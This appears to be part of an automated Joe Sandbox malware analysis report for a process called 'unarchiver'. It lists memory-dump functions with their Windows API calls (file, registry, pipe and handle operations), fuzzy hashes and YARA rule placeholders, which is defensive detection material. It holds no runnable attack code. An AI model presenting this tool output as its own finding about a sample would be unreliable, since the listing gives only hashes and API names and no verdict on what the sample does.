Opcode Fuzzy Hash: 5ca91548814092012d4e6b72d6723b921f285540cd9eaed74cda9e94c47cceaa
Instruction Fuzzy Hash: 58319FB1505380AFE722CF25DD45F66BFE8EF45224F08889EE9858B252D375E809CB71

Function 0131A120 Relevance: 1.6, APIs: 1, Instructions: 82
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0131A1C2

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: d20cbed37afb70ac1a80055d087ddda7222d5cdc3c342d6aad932294c9e2902f
Instruction ID: 62e36ee888d50b03bc6f720d2892f905ac11e2451909991cfab7301a5fc56a3f
Opcode Fuzzy Hash: d20cbed37afb70ac1a80055d087ddda7222d5cdc3c342d6aad932294c9e2902f
Instruction Fuzzy Hash: 1A21A17140D3C06FD3128B25CC51BA6BFB4EF47610F1985CBE8848F293D329A919C7A2

Function 0131AD2A Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131ADA7

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 540c9744a4e755b9bac57d09a2c36986bae653b465644cd7c954e58b8cfdd48b
Instruction ID: 7491757afacbd8f1f0569167a860835910113e81727b958d001138b4760b10ea
Opcode Fuzzy Hash: 540c9744a4e755b9bac57d09a2c36986bae653b465644cd7c954e58b8cfdd48b
Instruction Fuzzy Hash: 9321F171000604AFEB218F65DD45FABFBECEF04724F04886AFA45CB552D734E5488BA1

Function 0131A50F Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 0131A5B6

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: c326bceac01adf38cfabf8c05984202268f3930449bb96f9a5b3dda05212f5ca
Instruction ID: 9cd449c91e86b1180d60a9aba768abb26a3930a221467c0ff2ed62a3d532c563
Opcode Fuzzy Hash: c326bceac01adf38cfabf8c05984202268f3930449bb96f9a5b3dda05212f5ca
Instruction Fuzzy Hash: 592181B150D3806FD3138B25CC51B62BFB8EF87614F0A81DBE8849B593D625A919C7B2

Function 0131A370 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A40C

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1df6180eb83157ed2c7629013521b34251a333e49b9ff0480c93aea0ac783714
Instruction ID: 1f6f47b5e6c51e94f4f289638f32f310d3ff356ec3c47ea8e6686a06fc9c1b16
Opcode Fuzzy Hash: 1df6180eb83157ed2c7629013521b34251a333e49b9ff0480c93aea0ac783714
Instruction Fuzzy Hash: 50218DB1505780AFE721CF15DC84FA3BBF8EF05614F08849AE985CB252D364E948CB71

Function 0131B276 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131B2F3

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8f19f6981df9ba1473306224f0012fb35cd37a7b0ed5df130e94c15df65731ba
Instruction ID: 9778c05a0a0cb60fe759dc28d1fb8e3ea8257a0d1affd0d009a587b6d187d53a
Opcode Fuzzy Hash: 8f19f6981df9ba1473306224f0012fb35cd37a7b0ed5df130e94c15df65731ba
Instruction Fuzzy Hash: D321ED72400204AFEB219F65DC45FABFBACEF04724F04886AFA458A256D334E5188BA1

Function 0131A850 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A8DE

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f3e2d98d6e198873a31f0691430271af7e506b52409ea7819efdaaedb20c55f1
Instruction ID: c5121d16711fc99162bd421340d7312f544b4b8500885d6d2dd0a5a354dd02d3
Opcode Fuzzy Hash: f3e2d98d6e198873a31f0691430271af7e506b52409ea7819efdaaedb20c55f1
Instruction Fuzzy Hash: 8721C471409380AFE7228F24DC44FA2BFB8EF46714F0984DAF9848B153C324A909C771

Function 0131A933 Relevance: 1.6, APIs: 1, Instructions: 77
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A9C1

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 98cc7865c577ff9b87058bf677434ef638b7074e3bab5384651cf6eca6d926dc
Instruction ID: 6002bcf056be9fffc7421b53ce65ca59cfe7dd29b764cbf204905bca53c152ed
Opcode Fuzzy Hash: 98cc7865c577ff9b87058bf677434ef638b7074e3bab5384651cf6eca6d926dc
Instruction Fuzzy Hash: 7A21AE71409380AFDB228F25DD45F96BFB8EF06714F0884DAE9858B153C365A548CBB2

Function 0131A5FE Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0131A67D

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c9ab0d5e420918ace99206cfccc7e9cfcfaaaca4bda5694126203acf31ac340e
Instruction ID: 0c6695e85271fb382987d5c429eb4fec468184427c22328a17ea483f6a6d5c6b
Opcode Fuzzy Hash: c9ab0d5e420918ace99206cfccc7e9cfcfaaaca4bda5694126203acf31ac340e
Instruction Fuzzy Hash: D021C171501240AFE721CF65DD45F66FBE8EF08324F04886DEA498B256D375E408CB71

Function 0131A78F Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A815

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 104670c9bdf76d01a2fa8835c95fc5a1ae3caa659e7c40fcce8e7d5b3bf71da4
Instruction ID: 6314bbb2d651792b51d7231dc80f7e2870512e7fbdf28a748adff1f280b6b735
Opcode Fuzzy Hash: 104670c9bdf76d01a2fa8835c95fc5a1ae3caa659e7c40fcce8e7d5b3bf71da4
Instruction Fuzzy Hash: EA21E7B54097806FE7128B21DC45BA2BFB8DF47714F0880DBF9858B193D368A909C775

Function 0131AA0B Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0131AA8B

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d0f694f52b5c12cb2eb602a6e330ba63215e0aa1c37b45962f068f2ebb3884b5
Instruction ID: 816238b7a69483b2308171536e28576af50b10e8b0a5bd464394469f41512acf
Opcode Fuzzy Hash: d0f694f52b5c12cb2eb602a6e330ba63215e0aa1c37b45962f068f2ebb3884b5
Instruction Fuzzy Hash: BA21B0B25093C05FEB12CB29DC55B92BFE8AF06314F0D84EAE984CB153D325D909CB61

Function 0131A392 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A40C

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4f3b8663ada584a82ff602ff423ed95bcf2a9d788dea16278f5478185f58e819
Instruction ID: 86bf3660ae5fe677d6c831e8be75f2ff5ae158bd5c41962bbd94c6e6cc0a0a3e
Opcode Fuzzy Hash: 4f3b8663ada584a82ff602ff423ed95bcf2a9d788dea16278f5478185f58e819
Instruction Fuzzy Hash: 7421C0B1100644AFE720CF25DC89FA7FBECEF04614F04845AEA469B252D764E908CA71

Function 0131A962 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A9C1

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c1d5ed4320221568ac6a919d270dc8d2ffe009fb408a462b1e75bf56ec6dff6b
Instruction ID: 0800e43c316b46fde1d41582796aa8c056e76bd293d270812a8eb918e1e96103
Opcode Fuzzy Hash: c1d5ed4320221568ac6a919d270dc8d2ffe009fb408a462b1e75bf56ec6dff6b
Instruction Fuzzy Hash: 4F11E775400244AFEB21CF65DD45F67FBE8EF04724F04845AEA458B252C379A544CBB1

Function 0131A882 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A8DE

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 42d36713da32ddfda34497982e83ace6002b264f527178f76aa4f7bc79afce6a
Instruction ID: 51d9c88a908f63190dc87ecbbe849f6de59ba66f4c9879df0d154326e7e6ba76
Opcode Fuzzy Hash: 42d36713da32ddfda34497982e83ace6002b264f527178f76aa4f7bc79afce6a
Instruction Fuzzy Hash: ED11E3B5400244AFEB21CF65DD45F66FBE8EF44724F04849AEE498B246C378A5448BB2

Function 0131A2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0131A30C

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 218016aa9aa36aa4f251b3c23dcc7e855b0db44d5eae8758afbd727a3f89f993
Instruction ID: b0fbd61d2fb1927cd968180b7ff306e2204f140d872efbae2d3e3270f24f52e8
Opcode Fuzzy Hash: 218016aa9aa36aa4f251b3c23dcc7e855b0db44d5eae8758afbd727a3f89f993
Instruction Fuzzy Hash: 7611A3754097C09FD7238B25DC54A52BFB4DF07225F0984DBDD848F263D265A909CB72

Function 0131B1B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 0131B208

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: cd68807bd258e3e219d511b02061351cb2eb3e9be3d862e8518cc15ceca0adfb
Instruction ID: 09afc68c3215331280ad9057eb252c675e681aabd6dc2666c25f8a52a92bd4c7
Opcode Fuzzy Hash: cd68807bd258e3e219d511b02061351cb2eb3e9be3d862e8518cc15ceca0adfb
Instruction Fuzzy Hash: 2B1170714093809FDB128F15DC94B56FFB4DF46224F0884EAED848F257D275A908CB72

Function 0131AF8B Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0131AFE4

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 99e095f59e92fde4326a112f475632617e0e78051aebb9931f3cc22698a6ead5
Instruction ID: 4b62faaef390b113df80a303f08660320a1c72ddebee492278970fee3dbe4e1b
Opcode Fuzzy Hash: 99e095f59e92fde4326a112f475632617e0e78051aebb9931f3cc22698a6ead5
Instruction Fuzzy Hash: B011A0715097C09FD7128B25DC85A52FFF4EF06220F0984DBED858B263D378A908DB62

Function 0131A7C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A815

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1082aefc96b61e71ae841d50dc41fa69e8f3a5f08f79190621b34fcf9af63487
Instruction ID: 23d00e32cf1c5779fa66045e1d954bcc13b1fc0ef18dfcaae71ebdedaaba0567
Opcode Fuzzy Hash: 1082aefc96b61e71ae841d50dc41fa69e8f3a5f08f79190621b34fcf9af63487
Instruction Fuzzy Hash: 5F01D271500244AEE720CB25DD85BA6FFECDF44729F04C096EE458B246D378A9448AB6

Function 0131AA46 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0131AA8B

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: ad295a98064cfe95fcfb79aed1dfc8a5469a957f11f448a8ee41cdf76f6f3f8f
Instruction ID: b1c7f94af596a9edefcb40111c5c4166445206f75f7d5a2089436b5a1aaf4925
Opcode Fuzzy Hash: ad295a98064cfe95fcfb79aed1dfc8a5469a957f11f448a8ee41cdf76f6f3f8f
Instruction Fuzzy Hash: B611C4726012809FFB14CF69D985B56FBD8EF04625F08C4AADD09CB246E375E504CF61

Function 0131A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0131A1C2

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: a0129a44e7ac65ede1af83e26d84cd1d8906a322f0946009c2b2867a769bd60c
Instruction ID: 32b35e7d04f8b78da8285cf0db1464a2be023feff25d1893cba770cd9bff84c5
Opcode Fuzzy Hash: a0129a44e7ac65ede1af83e26d84cd1d8906a322f0946009c2b2867a769bd60c
Instruction Fuzzy Hash: E0017171500200ABD310DF26DD86B26FBE8EB88B20F14855AED089B741D735F915CBE5

Function 0131ABE6 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0131AC36

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 850cc17e3d9f1d0a88a850c37c0432e22282b0c034e1b392946e015cb4389db1
Instruction ID: 0abe1d447f6bbe1e2ae6e4d0c57bb5bedaaee31248ed502095123d5b202de39f
Opcode Fuzzy Hash: 850cc17e3d9f1d0a88a850c37c0432e22282b0c034e1b392946e015cb4389db1
Instruction Fuzzy Hash: 7C017171500200ABD310DF26DD86B26FBE8FB88B20F14855AED089B741D735F915CBE5

Function 0131A566 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 0131A5B6

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 135f8dc8076a17cd235683b2982ac79fdf4711c431d11e7760116f2804ddd9ce
Instruction ID: 84a78c7c22ad5468bdb2fb8379c47ac2bf13e61f20cf6cdf00441eb55cf3d169
Opcode Fuzzy Hash: 135f8dc8076a17cd235683b2982ac79fdf4711c431d11e7760116f2804ddd9ce
Instruction Fuzzy Hash: 90018671500600ABD310DF16DD86B26FBE8FB88B20F14815AED085B741D775FA15CBE5

Function 0131AFB2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0131AFE4

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: bddfea0eb7fddd93dde2d359f122668f542d66e26a06984028ef421f315dc16b
Instruction ID: 0e84686664da18b144cea87dfc16122d9ce1b2a6da7f77593c9865fc60628c9b
Opcode Fuzzy Hash: bddfea0eb7fddd93dde2d359f122668f542d66e26a06984028ef421f315dc16b
Instruction Fuzzy Hash: FC01F4B55006449FDB148F29DC85762FBE4EF04225F08C0AADD098B796D379E948CEA2

Function 0131B1D6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 0131B208

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d91836ed7668a11bd7f2ce4129200b1d3771f3e94b73486524932e6db9e815b9
Instruction ID: 531bc42b68283d6b2d00e55343118b0fcd046e9b400e948524613aaf748e80c6
Opcode Fuzzy Hash: d91836ed7668a11bd7f2ce4129200b1d3771f3e94b73486524932e6db9e815b9
Instruction Fuzzy Hash: 7901AD708002449FDB10DF55E985BAAFBE4EF05724F08C4AADD488F25AD379A508CBA2

Function 0131A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0131A30C

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e1677be946f6cd8810fb7de366713f9c551d7864fd9319c4bcee022a3be05842
Instruction ID: c8d553d501d321e5bd07d18c0eeae973280f476bc425ba3606959ac3b142ece3
Opcode Fuzzy Hash: e1677be946f6cd8810fb7de366713f9c551d7864fd9319c4bcee022a3be05842
Instruction Fuzzy Hash: CEF02270404284CFDB20CF15D885722FBE4EF04725F08C49ACD080F356D3B9A504CEA2

Function 01640C99 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

[M1, xrefs: 01640D43, 01640D48

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID: [M1
API String ID: 0-1606414677
Opcode ID: 007f8b81e3636407f623e561ebea7d1ec74f750ee09d042f68ca43574857a727
Instruction ID: 579e4d46a5d9416ecfaab7149fe6096da1065d98f37f8ef5d8fe483cf2e9c246
Opcode Fuzzy Hash: 007f8b81e3636407f623e561ebea7d1ec74f750ee09d042f68ca43574857a727
Instruction Fuzzy Hash: 8921E434B042548FCB15AB3A88446AF7BE69FC6208B55847CD585DB352DF399D028791

Function 01640CA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

[M1, xrefs: 01640D43, 01640D48

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID: [M1
API String ID: 0-1606414677
Opcode ID: e08c0ff8849788be0f9c2d570ee1bbc6e6e95343dc17e27d50360aa345d91566
Instruction ID: eb4e3a8014260edfd6db4ae5fcabb7b4878ee024fcfb3b2e61f8478d13ac5dfd
Opcode Fuzzy Hash: e08c0ff8849788be0f9c2d570ee1bbc6e6e95343dc17e27d50360aa345d91566
Instruction Fuzzy Hash: 6321E430B002148BCB14EB3A884466FBBD69FC5208B55843CD5959B345DF79E90687D5

Function 0131A6D4 Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0131A748

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e80ade33fc50da981c542fbf1677dbfeeb5017d3f784c67bea466467c2a42053
Instruction ID: 55c5b5ec1e53e5a50fcaff84c31dcf5280dae42af114f7422c2d3d16732ec47c
Opcode Fuzzy Hash: e80ade33fc50da981c542fbf1677dbfeeb5017d3f784c67bea466467c2a42053
Instruction Fuzzy Hash: 292180B59097C05FD7128B25DC95792BFB4EF06324F0984DADC858B5A3D2249909C772

Function 0131A716 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0131A748

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fa5ec19ccdc686ed136a59f34375f7cf350c54aecbf7d224bca38d86389fe34a
Instruction ID: 9060148bced9a310e8458249f40a534851859999af7fc6fc2f229da2272ea2a1
Opcode Fuzzy Hash: fa5ec19ccdc686ed136a59f34375f7cf350c54aecbf7d224bca38d86389fe34a
Instruction Fuzzy Hash: 9401F7745012408FDB10CF65E985756FBE4DF00325F08C4AADC0A8F646D379E544CFA2

Function 016402C0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527e9d5ca99ad52b899b79d8370481b89cf38137e9399a79f9fb408a0f6ded23
Instruction ID: 52e4c9efb80dc42f6eda21343146ef5795cb663c8682a6124dd0f473341a3a82
Opcode Fuzzy Hash: 527e9d5ca99ad52b899b79d8370481b89cf38137e9399a79f9fb408a0f6ded23
Instruction Fuzzy Hash: 55B10034A01210DFC728DF64E958A5A7BB6FF88344B21817DEA06A7756DB7C9C01CFA1

Function 01640799 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5700859621162aeea71a63ff29b776fcb776523c2d9da26e52b56e0a24775f89
Instruction ID: f326c4be534f2d583eb134937567b245e04628371f4f9049e0e4174b95c0a818
Opcode Fuzzy Hash: 5700859621162aeea71a63ff29b776fcb776523c2d9da26e52b56e0a24775f89
Instruction Fuzzy Hash: 4DA15B30B00215CBDB19AFB4D85576E77A6FBC8308F158069EA06A7395DF7C8C42CBA1

Function 01640BA0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807944b3c046f6a6892d0f1d59da713f6ed70363e7ca22ac0b3d7c915aa49bab
Instruction ID: b05a6629326bde69528b53e892f361960b5e48ed8462ec0aeff0466829d3eea1
Opcode Fuzzy Hash: 807944b3c046f6a6892d0f1d59da713f6ed70363e7ca22ac0b3d7c915aa49bab
Instruction Fuzzy Hash: 77115132A10218AFCB149BB4D84899E7BF6FFCD214B064479E606E7271EF359C058791

Function 01490808 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74492a061a9d3c33f020e34405d5e05c85b9c39c37104a9d4992a3d9ae4958b7
Instruction ID: fdb95d252004a4db823ec2e38c15ad912d656939cbe18906c0ba2ba44b8c0c8a
Opcode Fuzzy Hash: 74492a061a9d3c33f020e34405d5e05c85b9c39c37104a9d4992a3d9ae4958b7
Instruction Fuzzy Hash: 460175B140D3806FC701DB15AC45C67BFFCDE86524B0885AEF8448B612D265A9188BB2

Function 014905E1 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
